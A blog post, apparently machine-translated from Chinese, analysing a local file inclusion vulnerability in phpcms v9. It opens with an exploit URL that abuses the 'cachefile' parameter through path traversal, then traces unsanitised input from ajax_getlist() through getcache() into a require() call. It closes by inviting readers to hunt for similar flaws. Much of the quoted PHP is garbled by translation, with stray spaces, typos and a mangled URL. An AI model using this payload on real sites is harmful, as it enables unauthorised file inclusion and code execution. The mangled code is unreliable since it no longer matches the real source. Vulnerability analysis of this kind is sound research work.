Detailed analysis of phpcms v9 local File Inclusion Vulnerability

Vulnerability Author: b4dboy
Blog: http://www.secoff.net/
Vulnerability Analysis: Seay
Blog: http://www.cnseay.com/
Reprinted, Please retain the above copyright content.
Yesterday, I made a joke on Weibo that my blog is about to be closed, and I have received phone calls, text messages, QQ messages, and private messages from my friends, many other friends began to back up my blog post... It hurts. Sorry, sorry.

B4dboy kiyou released the dedecms and phpcmsv9 local Inclusion Vulnerability. I have also made a detailed analysis on the Dedecms vulnerability, but for some reason, it cannot be released for the moment. It will be released after two days. It hurts, some well-written articles cannot be published for some reason. They are really depressing and complicated. You can guess the specific reasons.

Send a phpcms v9 file. For more information, see http://www.cnseay.com/2530.
Based on the exp output by the author:
Http://www.php0day.com/api.php? Op = get_menu & act = ajax_getlist & callback = alert & path = b4dboy & cachefile =.../fuck

The vulnerability can be seen in the ajax_getlist () function of the get_menu.php file. Let's take a look.

 

function ajax_getlist() {$cachefile = $_GET['cachefile'];$path = $_GET['path'];$title = $_GET['title'];$key = $_GET['key'];$infos = getcache($cachefile,$path);$where_id = intval($_GET['parentid']);$parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);

OK. The cachefile parameter in exp is displayed.
$ Cachefile = $ _ GET ['cachefile'];
Continue to follow up, see
$ Infos = getcache ($ cachefile, $ path );

The getcache () function is called,

In line 3 of the \ phpcms \ libs \ functions \ global. func. php file

/*** Read cache. The default value is File Cache. cache configuration is not loaded. * @ Param string $ name cache name * @ param $ filepath data path (Module name) caches/cache _ $ filepath/* @ param string $ config configuration name */function getcache ($ name, $ filepath = '', $ type = 'file ', $ config = '') {pc_base: load_sys_class ('cache _ factory ','', 0); if ($ config) {$ cacheconfig = pc_base :: load_config ('caccache '); $ cache = cache_factory: get_instance ($ cacheconfig)-> get_cache ($ config);} else {$ cache = cache_factory: get_instance () -> get_cache ($ type);} return $ cache-> get ($ name, '','', $ filepath );}

OK. You can clearly see the passed $ name variable, that is, the cache name enters $ cache-> get ($ name, '','', $ filepath );.

Get function in phpcms \ libs \ classes \ cache_file.class.php File

 

public function get($name, $setting = '', $type = 'data', $module = ROUTE_M) {$this->get_setting($setting);if(empty($type)) $type = 'data';if(empty($module)) $module = ROUTE_M;$filepath = CACHE_PATH.'caches_'.$module.'/caches_'.$type.'/';$filename = $name.$this->_setting['suf'];//echo $filepath.$filename;exit();if (!file_exists($filepath.$filename)) {return false;} else {    if($this->_setting['type'] == 'array') {    $data = @require($filepath.$filename); 

I added echo $ filepath. $ filename; exit (); to the output path,

 

 

It's clear. For example, 1. cache. php In the root directory

 

 

 

If you look at similar functions carefully, you will find many similar functions. Start digging.

Original article. For more information, see copyright.

This article from Seay blog, http://www.cnseay.com/

We are committed to developing Reverse Analysis for web security research programs.